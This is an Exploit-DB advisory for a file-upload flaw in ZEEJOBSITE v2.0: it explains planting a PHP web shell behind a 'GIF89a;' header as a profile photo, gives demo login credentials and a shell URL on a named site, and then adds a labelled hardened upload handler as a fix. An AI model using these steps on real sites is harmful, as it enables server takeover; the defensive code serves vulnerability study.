- 18 Dec 2022
- EDB-ID: 7062
- EDB verification: Passed
- Author: ZORLU
- Vulnerability type: WEBAPPS
- Platform: PHP
- CVE: cve-2008-6913
- Publication date: 2008-11-08
Code:
ZEEJOBSITE v2.0 remote file Upload
author: ZoRLu msn: [email protected]
home: www.z0rlu.blogspot.com
dork: "[email protected]"
date: 08/11/2008 ( there, I'm sending it now, the time is 10:40 : ) )
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
<?
...
...
...
?>
and save your_shell.php
after jobseekers login to site ( direct link: localhost/jobseekers/jobseekerloginpage.php )
and you edit your profile ( direct link: http://localhost/jobseekers/editresume_next.php?rid=[id] )
add your photo ( your_shell.php upload ) after open new page you right click your photo and select to properties
copy photo link and paste your explorer go your shell
your_shell:
localhost/script_path/jobseekers/logos/[id].php
example for demo:
user: sabrina
passwd: testing:
login: http://zeejobsite.com/jobseekers/jobseekerloginpage.php
change profile direct link: http://zeejobsite.com/jobseekers/editresume_next.php?rid=47
and your_shell link:
http://zeejobsite.com/jobseekers/logos/7271406.php
thanks: str0ke & yildirimordulari.org & darkc0de.com
# milw0rm.com [2008-11-08]
- Source: www.exploit-db.com
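The advisory describes a file that starts with `GIF89a;` being accepted as a profile photo and stored under `logos/` with a `.php` name. A hardened upload handler for that case follows as an added example; it is not ZEEJOBSITE code and not part of the advisory. The function name, size limit and storage directory are assumptions, and it assumes the GD extension is available.

```php
<?php
// Added example, not ZEEJOBSITE code. Hypothetical helper; assumes the GD
// extension is loaded and that $storeDir lies outside the web root.

const MAX_PHOTO_BYTES = 2097152; // assumed limit: 2 MiB

function store_profile_photo(array $upload, string $storeDir): string
{
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($upload['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if (filesize($upload['tmp_name']) > MAX_PHOTO_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Header sniffing (magic bytes, getimagesize(), the client-sent MIME type)
    // only inspects the first bytes, so "GIF89a;" followed by script text can
    // pass it. Decode the whole file instead; GD returns false when the data
    // is not a complete image.
    $data  = file_get_contents($upload['tmp_name']);
    $image = $data === false ? false : @imagecreatefromstring($data);
    if ($image === false) {
        throw new RuntimeException('not a decodable image');
    }

    // Never reuse the client's file name or extension. The server picks both,
    // so the stored file cannot end in .php whatever was uploaded.
    $name = bin2hex(random_bytes(16)) . '.png';
    $path = rtrim($storeDir, '/') . '/' . $name;

    // Re-encoding writes fresh pixel data only; comments, trailing bytes and
    // other non-image content in the upload are dropped.
    if (!imagepng($image, $path)) {
        throw new RuntimeException('could not store image');
    }

    return $name; // serve through a script that sets Content-Type: image/png
}
```

If the upload directory has to stay inside the web root, script execution should also be disabled for it in the web server configuration, so that the forced extension is not the only control.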